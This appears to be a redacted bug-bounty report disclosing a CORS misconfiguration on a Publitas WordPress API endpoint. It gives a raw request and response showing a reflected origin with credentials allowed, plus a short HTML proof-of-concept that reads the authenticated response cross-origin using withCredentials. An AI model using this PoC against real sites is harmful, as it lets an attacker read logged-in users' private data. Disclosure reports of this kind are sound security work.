Publitas: CORS Misconfiguration on █████

Summary:
An cross-origin resource sharing (CORS) policy controls whether and how content running on other domains can perform two-way interaction with the domain that publishes the policy. The policy is fine-grained and can apply access controls per-request based on the URL and other features of the request. If the site specifies the header Access-Control-Allow-Credentials: true, third-party sites may be able to carry out privileged actions and retrieve sensitive information. This bug could be used to steal users information or force the user to execute unwanted actions. As long that a legit and logged in user is lure to access a attacker controlled HTML page
Steps To Reproduce:

1. visit ███

2.Request:

GET ███wp-json███ HTTP███2
Host: ███████
Origin: ███
Cookie: ██████
User-Agent: Mozilla███5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko███████████ Firefox██████████121.0
Accept: ████
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Sec-Purpose: prefetch
Referer: ████████
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
Te: trailers

Response:

HTTP██████████2 200 OK
Date: ████████ ██████ GMT
Content-Type: application████json; charset=UTF-8
Cf-Ray: 84a84c179f6b17b4-MAA
Cf-Cache-Status: MISS
Access-Control-Allow-Origin: ████
Allow: GET
Cache-Control: public, max-age=0, s-maxage=2592000
Last-Modified: ██████████ ██████████ GMT
Link: <█████>; rel=“█████”
Strict-Transport-Security: max-age=63072000
Vary: Accept-Encoding, Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Headers: Authorization, X-WP-Nonce, Content-Disposition, Content-MD5, Content-Type, X-HTTP-Method-Override
Access-Control-Allow-Methods: OPTIONS, GET, POST, PUT, PATCH, DELETE
Access-Control-Expose-Headers: X-WP-Total, X-WP-TotalPages, Link
Cache-Tag: d0c98d67-2142-45ee-954b-1652d3db1a93,fa5143bd373309212ef342e7c36d3fda7a55c64c19ac2d96e87806793ef0932a
Content-Security-Policy: frame-ancestors ████
Ki-Cache-Tag: d0c98d67-2142-45ee-954b-1652d3db1a93,fa5143bd373309212ef342e7c36d3fda7a55c64c19ac2d96e87806793ef0932a
Ki-Cache-Type: Edge
Ki-Cf-Cache-Status: SAVING
Ki-Edge: v=20.2.6;mv=3.0.2
Ki-Origin: g1p
X-Content-Type-Options: nosniff
X-Edge-Location-Klb: 1
X-Frame-Options: SAMEORIGIN
X-Kinsta-Cache: HIT
X-Robots-Tag: noindex
X-Xss-Protection: 1; mode=block
Report-To: {“endpoints”:[{“url”:“████\████████report\██████████v3?s=uvZk8ldCAmNz0%2F9Xef5wFWaUlBaHropQljH0tc8ZmEqnRuk0mzHwH8vv8EwfDONYj1KFENko4G33KbzoNZ1sZ4tFcTACe4%2Bey7nv%2FwVpxWfSHRYCd3UK4NxREMnLTg1GXR0%3D”}],“group”:“cf-nel”,“max_age”:604800}
Nel: {“success_fraction”:0.01,“report_to”:“cf-nel”,“max_age”:604800}
Server: cloudflare
Alt-Svc: h3=“:443”; ma=86400
and some json codes…

Note:by adding the Like repose from the page in the following code developed it can be exploded

code:

<!DOCTYPE html>
<html>
<head>
<script>
function cors() {
var xhttp=new XMLHttpRequest();
xhttp.onreadystatechange= function() {
if (this.readyState == 4 && this.status ==200){
document.getElementById(“emo”).innerHTML=alert(this.responseText
);
}
};
xhttp.open(‘GET’,“████”,true);
xhttp.withCredentials=true;
xhttp.send();
}
<████script>
<██████████head>
<body>
<center>
<h2>[!]CORS PoC Exploit!!!<███h2>
<div>
<button type=“button” onclick=“cors()”>Exploit<███████button>
<████div>
<██████████center>
<████body>
<███html>

I have the PoC attached which is the output for the above

Impact

1.Attacker would treat many victims to visit attacker’s website, if victim is logged in, then his personal information is recorded in attacker’s server.
2.Also If the site specifies the header Access-Control-Allow-Credentials: true, third-party sites may be able to carry out privileged actions and retrieve sensitive information.